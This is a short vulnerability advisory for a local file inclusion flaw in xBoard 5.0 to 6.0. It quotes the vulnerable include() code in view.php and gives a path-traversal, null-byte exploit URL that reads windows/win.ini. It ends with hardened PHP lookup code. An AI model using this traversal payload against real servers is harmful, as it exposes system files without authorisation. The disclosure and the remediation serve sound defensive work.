xBoard 5.0 / 5.5 / 6.0 Local File Inclusion

2013.12.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

[+] Author: TUNISIAN CYBER
[+] Exploit Title: xBoard 5.0/5.5/6.0 Local File Inclusion
[+] Date: 24-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/xboard/
[+] Google Dork:
[+] Tested on: Win7 , ubuntu 13.04
########################################################################################

I/Vulnerable code:

view.php

v5.0 (lines 49-51):
    if (file_exists("$directory/$post.html"))
    {
    include("$directory/$post.html");

v5.5 (lines 28-30):
    if (file_exists("$directory/$post.html"))
    {
    include("$directory/$post.html");

v6.0 (lines 27-29):
    if (file_exists("$directory/$post.html"))
    {
    include("$directory/$post.html");

II/Exploit and p.0.c:

http://{host}/xboard/view.php?post=../../../../../../../../../../windows/win.ini%00

p.0.c:
http://oi44.tinypic.com/2uxyaz9.jpg

III/Solution:

Upgrade to v6.5

./3nD
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt
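
A hardened form of the view.php lookup quoted above, as an added example that is not xBoard's code and not the v6.5 fix. It assumes posts are static HTML files in a "posts" directory beside the script and that post names use only letters, digits, "_" and "-"; resolve_post is a hypothetical helper name.

```php
<?php
// Added example, not xBoard code. Assumptions: posts live in ./posts and
// post names contain only letters, digits, "_" and "-".

/**
 * Resolve a user-supplied post name to a file inside $directory.
 * Returns the canonical path, or null if the name is unsafe or missing.
 */
function resolve_post(string $directory, string $post): ?string
{
    // 1. Allow-list the name. This rejects "/", "\", "." and NUL bytes,
    //    so "../" sequences and a trailing %00 never reach the filesystem.
    //    \A and \z anchor the whole string ("$" would allow a trailing newline).
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $post)) {
        return null;
    }

    // 2. Canonicalise both paths and confirm the target is still inside
    //    the posts directory (defence in depth; also catches symlinks).
    $base = realpath($directory);
    $path = realpath($directory . DIRECTORY_SEPARATOR . $post . '.html');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$directory = __DIR__ . '/posts'; // assumed location of the post files
$post = (isset($_GET['post']) && is_string($_GET['post'])) ? $_GET['post'] : '';

$file = resolve_post($directory, $post);
if ($file === null) {
    http_response_code(404);
    exit('Post not found');
}

// Posts are static HTML, so send the bytes instead of include()-ing them:
// readfile() never executes PHP that might be embedded in the file.
readfile($file);
```

With this check, the post value from section II fails the allow-list in step 1 and the request ends in the 404 branch without any file being opened.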

